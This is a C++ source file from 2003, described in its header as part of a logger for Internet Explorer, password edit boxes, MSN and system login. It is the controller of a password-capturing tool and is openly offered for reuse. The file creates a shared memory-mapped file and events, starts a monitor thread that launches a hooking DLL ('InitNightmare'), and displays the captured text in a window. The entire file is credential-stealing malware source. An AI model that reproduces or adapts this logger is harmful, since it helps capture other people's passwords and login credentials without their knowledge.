
/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/3/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
		   All rights reserved. May not be sold for profit.
 ************************************/
#include "StdAfx.h"
#include "ApparitionThread.h"
#include "ComDef.h"
#include "Nightmare.h"


//Used by Monitor Thread
HANDLE g_hMMF;
HANDLE g_hReadEvent;
HANDLE g_hWriteEvent;
HANDLE g_hThreadEvent;

DWORD WINAPI MonitorThread(LPVOID lpParam);

//Debug & Demo Only
void DemoData(LPVOID lpData, DWORD dwLen);

BOOL InitThread(LPVOID lpParam)
{
	//create MMF
    g_hMMF = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, 
            PAGE_READWRITE, 0, NightmareMMFSize, g_MMF_NAME);
    if (g_hMMF == NULL)
	{
		::ReportErr(_T("Create g_hMMF Memory Mapping File Failure"));
	}
	else if(GetLastError() == ERROR_ALREADY_EXISTS)
	{
		::ReportErr(_T("g_hMMF Name Collision"));
		if(AfxMessageBox(_T("Continued Anyway?"), MB_YESNO) == IDYES)
		{
		}
		else ::PostQuitMessage(-1);
	}

	//Write to MMF header with size info
	LPVOID pView = MapViewOfFile(g_hMMF, FILE_MAP_WRITE, 0, 0, 0);
	DWORD dwSize = NightmareMMFSize;
	DWORD dwUsed = 0;
	LPBYTE lpByte = (LPBYTE)pView;
	::CopyMemory(lpByte, &dwSize, 4);
	::CopyMemory(lpByte + 4, &dwUsed, 4);
	::UnmapViewOfFile(pView);

	
	g_hReadEvent = ::CreateEvent(NULL, TRUE, FALSE, g_READ_EVENT_MMF_NAME);
	if(g_hReadEvent == NULL)
	{
		::ReportErr(_T("g_READ_EVENT_MMF_NAME Event Creation Failed")); 
		::PostQuitMessage(-1);
	}

	g_hWriteEvent = ::CreateEvent(NULL, TRUE, FALSE, g_WRITE_EVENT_MMF_NAME);
	if(g_hWriteEvent == NULL)
	{
		::ReportErr(_T("g_WRITE_EVENT_MMF_NAME Event Creation Failed")); 
		::PostQuitMessage(-1);
	}

	g_hThreadEvent = ::CreateEvent(NULL, TRUE, FALSE, NULL);
	if(g_hThreadEvent == NULL)
	{
		::ReportErr(_T("g_hThreadEvent Thread Event Creation Failed")); 
		::PostQuitMessage(-1);
	}


	::ResetEvent(g_hThreadEvent);
	::ResetEvent(g_hReadEvent);
	::ResetEvent(g_hWriteEvent);
	
	//create monitor message thread
	DWORD dwThreadId;
	HANDLE hThread = CreateThread(NULL, 0, MonitorThread, NULL, 0, &dwThreadId);
    if (hThread == NULL)
	{
		ReportErr(_T("Monitor Thread Launch Error"));
		::PostQuitMessage(-1);
	}
	::CloseHandle(hThread);
	return TRUE;
}

BOOL ExitThread()
{
	SetEvent(g_hThreadEvent);
	::Sleep(500); //Let the thread terminate

	//closed in thread
	::CloseHandle(g_hMMF);
	::CloseHandle(g_hReadEvent);
	::CloseHandle(g_hWriteEvent);
	::CloseHandle(g_hThreadEvent);

	return TRUE;
}

DWORD WINAPI MonitorThread(LPVOID lpParam)
{
    HANDLE hKillEvent = g_hThreadEvent;

    HANDLE hMMF, hWriteEvent, hReadEvent;

	__try
	{
		hMMF = OpenFileMapping(FILE_MAP_READ | FILE_MAP_WRITE, FALSE, g_MMF_NAME);
        if (hMMF == NULL) 
		{
			::ReportErr(_T("Open MMF Failed in Thread")); __leave;
		}

	    hWriteEvent = ::OpenEvent(EVENT_ALL_ACCESS, FALSE,g_WRITE_EVENT_MMF_NAME);
	    if(hWriteEvent == NULL)
		{
			::ReportErr(_T("Open Write Event Failed in Thread")); __leave;
		}

	    hReadEvent = ::OpenEvent(EVENT_ALL_ACCESS, FALSE,g_READ_EVENT_MMF_NAME);
	    if(hReadEvent == NULL)
		{
			::ReportErr(_T("Open Read Event Failed in Thread")); __leave;
		}
        //the DLL can write to MMF
	    ::SetEvent(hWriteEvent);

		//DLL Launched
		::InitNightmare(NULL);
		
	    HANDLE hReadArr[2];
	    hReadArr[0] = hKillEvent;
	    hReadArr[1] = hReadEvent;
	    while(1)
		{
			DWORD dwRet = ::WaitForMultipleObjects(2, hReadArr, FALSE, 1000);//INFINITE);
            if(WAIT_OBJECT_0  == dwRet)
			{
				__leave; //Kill Event
			}
		    if(dwRet == WAIT_TIMEOUT)
			{
				//check if any target window handle obsolete
			    //CheckHookedPasswordEditArray();
			    continue;
			}
	        if(dwRet == WAIT_ABANDONED_0 || dwRet == WAIT_ABANDONED_0 + 1)
			{
				::ReportErr(_T("Mon Thread Wait Read Failed"));
		        __leave;
			}
            ASSERT((WAIT_OBJECT_0 + 1) == dwRet);
		    //Stop DLL from Writing
		    ::ResetEvent(hReadEvent);
		 		
	        LPVOID pView = MapViewOfFile(hMMF, FILE_MAP_ALL_ACCESS, 0, 0, 0);
	        if(pView == NULL) __leave; 
		    LPBYTE lpByte = (LPBYTE)pView;

		    DWORD dwSize, dwUsed;
            ::CopyMemory(&dwSize, lpByte, sizeof(UINT));
		    lpByte += sizeof(DWORD);
		    ::CopyMemory(&dwUsed, lpByte, sizeof(WPARAM));
		    lpByte += sizeof(DWORD);
		    DemoData((LPVOID)lpByte, dwUsed);
			
			//Clear MMF
			dwUsed = 0;
			lpByte -= sizeof(DWORD);
		    ::CopyMemory(lpByte, &dwUsed, 4);
		    
		    ::UnmapViewOfFile(pView);
		    ::SetEvent(hWriteEvent);
		}
	}
	__finally
	{
		::CloseHandle(hMMF);
		::CloseHandle(hWriteEvent);
		::CloseHandle(hReadEvent);

		::ExitNightmare();
		return 0;
	}
	return 0;
}

void DemoData(LPVOID lpData, DWORD dwLen)
{
	//Oh, MAN !!! We are Unicode ONLY
	LPTSTR pStr = (LPTSTR)lpData;
	pStr[dwLen/sizeof(TCHAR)] = TCHAR('\0');

	::SendMessage(g_hEdit, EM_SETSEL, (WPARAM)-1, (LPARAM)-1);
	::SendMessage(g_hEdit, EM_REPLACESEL, 
           (WPARAM)0,    // undo option
           (LPARAM)(LPCTSTR)pStr     // text string (LPCTSTR)
        );
}